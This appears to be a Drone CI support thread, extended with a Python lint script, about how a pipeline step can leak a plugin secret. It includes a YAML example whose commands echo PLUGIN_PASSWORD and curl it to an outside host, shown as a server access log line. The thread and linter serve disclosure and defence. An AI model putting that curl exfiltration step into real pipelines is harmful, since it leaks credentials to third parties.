configuration is

```yaml
- name: build-image
  image: plugins/docker
  volumes:
  - name: tmp
    path: /build
  settings:
    repo: citest
    auto_tag: true
    dry_run: true
    password:
      from_secret: passwd
  commands:
  - echo "$PLUGIN_REPO"
  - echo "$PLUGIN_AUTO_TAG"
  - echo "$PLUGIN_PASSWORD"
  - apk add --no-cache curl
  - curl -s "http://domain.com/testci/$PLUGIN_PASSWORD" -v
```
`PLUGIN_PASSWORD` will be exposed in the access.log of domain.com:

```
172.26.0.2 - - [25/Jun/2019:17:15:49 +0800] "GET /testci/mypassword HTTP/1.1" 404 169 "-" "curl/7.64.0" "-"
```
So, is there any way to avoid this? Can the plugin ignore `commands`?
First, it is important to note that anyone with write access to your repository can find a way to expose a secret. This is true of most CI systems including Drone, Travis, Circle and others because anyone with write access can modify a yaml to expose a secret.
You can sign a yaml file to prevent tampering and protect against certain vectors, especially if you make secrets available to pull requests (which is otherwise disabled by default). See https://docs.drone.io/user-guide/signature/. But please note that this does not prevent a user with write access from modifying your yaml file to expose a secret and then re-signing the yaml.
If you do not trust your collaborators you should only grant read access, and require everyone to submit pull requests for patches. Limiting who has write access to your repository is the best way to prevent malicious tampering with your source code.
Update: GitHub also provides a new branch restriction feature which can prevent developers from pushing code directly. This enforces a fork and pull request workflow and can help mitigate this vector.
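As an added defensive check (not part of the original thread and not Drone's own code), the following Python script lints a parsed pipeline for the pattern the question describes: a `plugins/*` step whose entrypoint is overridden with `commands` while a `from_secret` value sits in `settings`, so the commands can read the secret from its `PLUGIN_*` environment variable. It takes the dict that `yaml.safe_load` would return; the sample pipeline below is constructed inline to mirror the question.

```python
def setting_env_name(key: str) -> str:
    # Drone exports each plugin setting as PLUGIN_<KEY>, e.g. auto_tag -> PLUGIN_AUTO_TAG
    return "PLUGIN_" + key.upper()

def secret_settings(settings: dict) -> dict:
    # {setting_key: secret_name} for settings that are filled from a secret
    out = {}
    for key, value in (settings or {}).items():
        if isinstance(value, dict) and "from_secret" in value:
            out[key] = value["from_secret"]
    return out

def find_exposed_plugin_secrets(pipeline: dict) -> list:
    # Flag steps that run a plugin image, override its entrypoint with `commands`,
    # and pass a secret through `settings`: the commands can read it from PLUGIN_*.
    findings = []
    for step in pipeline.get("steps", []):
        image = str(step.get("image", ""))
        if not image.startswith("plugins/") or "commands" not in step:
            continue
        for key, secret in secret_settings(step.get("settings")).items():
            findings.append({"step": step.get("name", "<unnamed>"), "image": image,
                             "env": setting_env_name(key), "secret": secret})
    return findings

# Constructed sample mirroring the pipeline in the question (not a real config).
SAMPLE_PIPELINE = {
    "kind": "pipeline", "name": "default",
    "steps": [
        {   # plugin step whose entrypoint is replaced by shell commands
            "name": "build-image", "image": "plugins/docker",
            "settings": {"repo": "citest", "auto_tag": True, "dry_run": True,
                         "password": {"from_secret": "passwd"}},
            "commands": ['echo "$PLUGIN_REPO"'],
        },
        {   # same plugin without commands: only the plugin binary sees the secret
            "name": "publish", "image": "plugins/docker",
            "settings": {"repo": "citest", "password": {"from_secret": "passwd"}},
        },
    ],
}

if __name__ == "__main__":
    for f in find_exposed_plugin_secrets(SAMPLE_PIPELINE):
        print(f"step {f['step']!r} ({f['image']}): commands can read secret "
              f"{f['secret']!r} via ${f['env']}")
```

Running this as a pre-merge check only catches the obvious pattern; as the answer notes, anyone with write access can still restructure the YAML, so it complements rather than replaces restricting write access.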